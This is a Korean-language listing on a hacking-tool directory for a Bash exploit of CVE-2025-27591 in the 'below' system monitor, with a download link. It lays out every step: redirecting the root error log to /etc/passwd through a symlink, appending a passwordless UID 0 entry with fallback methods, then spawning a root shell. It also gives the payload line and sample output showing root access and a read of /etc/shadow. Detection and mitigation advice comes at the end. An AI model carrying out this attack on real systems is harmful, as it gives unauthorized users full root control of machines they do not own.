Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — Bash 기반의 권한 상승 익스플로잇으로, `below` 시스템 성능 모니터링 도구를 대상으로 합니다. 이 개선된 익스플로잇은 로깅 메커니즘의 심볼릭 링크 취약점을 이용하여 `/etc/passwd`에 루트 사용자를 주입함으로써 완전한 루트 액세스 권한을 획득합니다. | Kitploit
도구/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

Bash 기반의 권한 상승 익스플로잇으로, `below` 시스템 성능 모니터링 도구를 대상으로 합니다. 이 개선된 익스플로잇은 로깅 메커니즘의 심볼릭 링크 취약점을 이용하여 `/etc/passwd`에 루트 사용자를 주입함으로써 완전한 루트 액세스 권한을 획득합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
29개월 전아직 검토되지 않음

Buy me a knowledge

CVE-2025-27591 익스플로잇 - Below Logger 심볼릭 링크 공격

below 시스템 성능 모니터링 도구를 대상으로 하는 Bash 기반 권한 상승 익스플로잇입니다. 개선된 이 익스플로잇은 로깅 메커니즘의 심볼릭 링크 취약점을 이용하여 /etc/passwd에 루트 사용자를 주입하여 완전한 루트 액세스를 획득합니다.

크레딧

발견 및 보고: Matthias Gerstner @ SUSE - 보안 권고

취약점 세부 사항

  • CVE: CVE-2025-27591
  • 영향을 받는 구성 요소: /usr/bin/below (Facebook의 시스템 성능 모니터)
  • 영향을 받는 버전: 로그 디렉터리에 전역 쓰기 권한이 있는 below 버전
  • 취약점 유형: 심볼릭 링크 공격 / 권한 상승
  • 공격 벡터: /var/log/below/error_root.log → /etc/passwd
  • CVSS 점수: 높음 (루트로의 권한 상승)

개요

below 모니터링 도구는 높은 권한으로 실행될 때 오류를 /var/log/below/error_root.log에 기록합니다. 로그 디렉터리에 전역 쓰기 권한이 있는 경우 공격자는:

  1. error_root.log에서 /etc/passwd로의 심볼릭 링크를 생성합니다.
  2. below record 명령을 트리거하여 오류 메시지를 심볼릭 링크에 기록합니다.
  3. UID=0(루트 권한)을 가진 악성 사용자 항목을 수동으로 주입합니다.
  4. 새로 생성된 사용자를 사용하여 루트 셸을 실행합니다.

이 익스플로잇은 다양한 시스템 구성을 처리하기 위한 지능형 대체 메커니즘과 함께 전체 프로세스를 자동화합니다.

익스플로잇 흐름 다이어그램

root@kitploit:~
flowchart TD
    A[Start Exploit] --> B[Get Username from User]
    B --> C{Check /var/log/below<br/>World-Writable?}
    C -->|No| D[Exit: Not Vulnerable]
    C -->|Yes| E[Remove Existing error_root.log]
    E --> F[Create Symlink:<br/>error_root.log → /etc/passwd]
    F --> G{Symlink Created<br/>Successfully?}
    G -->|No| D
    G -->|Yes| H[Execute: sudo below record]
    H --> I[Wait 3 seconds for logging]
    I --> J[Kill below process]
    J --> K{Payload in<br/>/etc/passwd?}
    K -->|Yes| M[Success Path]
    K -->|No| L[Attempt Manual Injection:<br/>echo payload >> symlink]
    L --> N{Manual Injection<br/>Success?}
    N -->|No| O[Try Fallback:<br/>sudo tee -a]
    N -->|Yes| M
    O --> P{Fallback<br/>Success?}
    P -->|No| D
    P -->|Yes| M
    M --> Q[Verify Payload in /etc/passwd]
    Q --> R[Disable Cleanup Trap]
    R --> S[Execute: su username]
    S --> T[Root Shell Obtained]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

기술 세부 사항

익스플로잇 단계

  1. 사전 점검 단계

    • /var/log/below 디렉터리가 존재하는지 확인
    • 디렉터리에 전역 쓰기 권한(o+w)이 있는지 확인
    • 심볼릭 링크 생성 기능 테스트
  2. 설정 단계

    • 기존 error_root.log 파일 제거
    • 심볼릭 링크 생성: /var/log/below/error_root.log → /etc/passwd
    • 심볼릭 링크가 올바른 대상을 가리키는지 확인
  3. 주입 단계 (기본 방법)

    • 백그라운드에서 sudo below record 실행
    • 오류 로깅을 트리거하기 위해 3초 동안 프로세스 실행
    • 지속적인 로깅을 방지하기 위해 프로세스 종료
    • 오류 메시지가 유용한 방식으로 /etc/passwd를 손상시켰는지 확인
  4. 주입 단계 (대체 방법)

    • 방법 1: 심볼릭 링크를 통한 직접 추가 (echo >> symlink)
    • 방법 2: sudo와 함께 tee 사용 (sudo tee -a)
  5. 셸 실행 단계

    • /etc/passwd에 악성 사용자가 존재하는지 확인
    • 제거를 방지하기 위해 정리 트랩 비활성화
    • su <username>을 실행하여 루트 셸 획득

페이로드 구조

주입된 /etc/passwd 항목은 다음 형식을 따릅니다:

root@kitploit:~
username::0:0:username:/root:/bin/bash

필드 설명:

  • username: 사용자가 제공한 사용자 이름 (기본값: "0xdtc")
  • ::: 빈 암호 필드 (암호 필요 없음)
  • 0:0: UID=0, GID=0 (루트 권한)
  • username: GECOS 필드 (사용자 설명)
  • /root: 홈 디렉터리
  • /bin/bash: 로그인 셸

전제 조건

  • 취약한 below 바이너리가 실행 중인 대상 시스템
  • /var/log/below 디렉터리에 전역 쓰기 권한이 있어야 함
  • 사용자가 below record를 실행할 수 있는 sudo 액세스 권한이 있어야 함
  • Bash 셸 환경

사용 방법

기본 실행

root@kitploit:~
# 스크립트 실행 가능하게 설정
chmod +x CVE-2025-27591

# 익스플로잇 실행
./CVE-2025-27591

대화형 프롬프트

root@kitploit:~
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): myuser
[+] Using username: myuser

예제 출력

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): 0xdtc
[+] Using username: 0xdtc

[*] Checking for CVE-2025-27591 vulnerability
[+] /var/log/below is world-writable
[*] Testing symlink creation
[+] Symlink test successful
[+] Target is vulnerable

[*] Starting exploitation
[+] Wrote payload to /tmp/exploit_payload
[*] Creating symlink: /var/log/below/error_root.log -> /etc/passwd
[+] Symlink created
[*] Executing 'sudo below record' to trigger logging
[*] Started 'below record' with PID: 12345
[*] Checking if payload was written
[*] Attempting manual injection
[*] Appending payload to /etc/passwd via symlink
[+] Payload appended
[+] Exploitation completed! Payload is in /etc/passwd
[*] Spawning root shell via 'su 0xdtc'
[*] Password should be empty, just press Enter

root@kali:/tmp# whoami
root

기능

지능형 차단 처리

스크립트에는 다양한 시스템 구성을 처리하기 위한 여러 대체 메커니즘이 포함되어 있습니다:

  1. 기존 파일 처리

    • 기존 로그 파일 자동 감지 및 제거
    • 일반 파일 및 기존 심볼릭 링크 모두 처리
    • 진행 전 심볼릭 링크 대상 확인
  2. 다중 주입 방법

    • 기본: below record 오류 로깅을 통한 트리거
    • 대체 1: 심볼릭 링크에 직접 추가
    • 대체 2: sudo tee를 사용한 권한 있는 쓰기
  3. 프로세스 관리

    • 중단된 below 프로세스 자동 종료
    • 리소스 고갈 방지
    • 실패 시 프로세스 정리 처리
  4. 재실행 감지

    • /etc/passwd에 페이로드가 이미 존재하는지 확인
    • 사용자가 이미 생성된 경우 익스플로잇 건너뛰기
    • 재실행 시 직접 셸 실행

코드 품질 기능

  • 포괄적인 주석: 모든 기능 및 중요 단계 문서화
  • 섹션 헤더: 코드를 논리적 섹션으로 구성
  • 오류 처리: 적절한 오류 확인 및 사용자 피드백
  • 깔끔한 종료: 실패 시 graceful 정리를 위한 트랩 핸들러
  • 최소 종속성: 표준 Unix 도구를 사용한 순수 Bash

파일 구조

root@kitploit:~
.
├── CVE-2025-27591           # Main exploitation script
├── README.md           # This documentation
└── /tmp/exploit_payload # Temporary payload file (created at runtime)

확인

익스플로잇 성공 후 루트 액세스 확인:

root@kitploit:~
# 현재 사용자 확인
root@target:/tmp# whoami
root

# 사용자 ID 및 그룹 확인
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# /etc/passwd에서 사용자 확인
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# 루트 전용 파일 읽기
root@target:/tmp# cat /etc/shadow
[... shadow file contents ...]

정리

테스트 후 악성 사용자를 제거해야 하는 경우:

root@kitploit:~
# /etc/passwd에서 주입된 사용자 제거
sudo sed -i '/^username:/d' /etc/passwd

# 남은 심볼릭 링크 제거
rm -f /var/log/below/error_root.log

username을 익스플로잇 중 사용한 실제 사용자 이름으로 바꾸십시오.

탐지 및 완화

탐지 방법

  1. 파일 무결성 모니터링

    root@kitploit:~
    # /etc/passwd의 무단 변경 모니터링
    aide --check
    
  2. 심볼릭 링크 탐지

    root@kitploit:~
    # 로그 디렉터리에서 의심스러운 심볼릭 링크 확인
    find /var/log -type l -ls
    
  3. 감사 로그

    root@kitploit:~
    # 의심스러운 sudo 사용 확인
    grep "below record" /var/log/auth.log
    

완화 전략

  1. 디렉터리 권한 수정

    root@kitploit:~
    # 로그 디렉터리에서 전역 쓰기 권한 제거
    sudo chmod 755 /var/log/below
    
  2. AppArmor/SELinux 정책

    • 강제 액세스 제어 구현
    • below 바이너리 파일 쓰기 위치 제한
  3. Below 업데이트

    • Facebook/Meta의 보안 패치 적용
    • 패키지 관리자 업데이트 사용
  4. /etc/passwd 모니터링

    • 파일 무결성 모니터링(AIDE, Tripwire) 설정
    • UID=0 사용자 추가 시 알림

법적 고지 사항

이 익스플로잇은 교육 목적 및 승인된 침투 테스트에만 사용됩니다.

컴퓨터 시스템에 대한 무단 액세스는 불법입니다. 보안 테스트를 수행할 명시적 권한이 있는 시스템에서만 이 도구를 사용하십시오. 저자는 이 도구의 오용에 대해 어떠한 책임도 지지 않습니다.

이 익스플로잇을 사용함으로써 귀하는 다음을 확인합니다:

  • 대상 시스템을 테스트할 적절한 권한을 보유하고 있음
  • 관련 법률 및 규정을 이해하고 있음
  • 귀하의 행동에 대한 전적인 책임을 수락함

저장소: https://github.com/0xDTC/ 저자: Divine Clown (0xDTC) 라이선스: 교육 목적 전용 최종 업데이트: 2025-11-13

도구 다운로드